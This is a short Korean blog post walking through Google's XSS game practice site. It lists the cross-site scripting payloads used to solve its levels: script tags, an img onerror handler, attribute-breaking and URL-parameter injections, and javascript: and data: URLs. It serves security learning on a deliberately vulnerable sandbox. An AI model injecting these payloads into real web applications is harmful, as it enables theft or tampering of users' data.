Ⅲ. 정보보안
XSS game
agencies
2024. 1. 22. 11:09
링크:https://xss-game.appspot.com/
XSS game
Welcome, recruit! Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps and you must learn to dispatch the
xss-game.appspot.com
Let me at 'em!을 클릭합니다.
우리의 목표는 alert를 띄우는 것이기 때문에 대표적인 구문을 입력했습니다.
<script>alert()</script>
<img src=1 onerror=alert()>
4'onerror=alert()>
?timer=')%3balert('
?next=javascript:alert()
GO를 클릭하고 Next>> 버튼을 클릭합니다.
data:text/javascript,alert();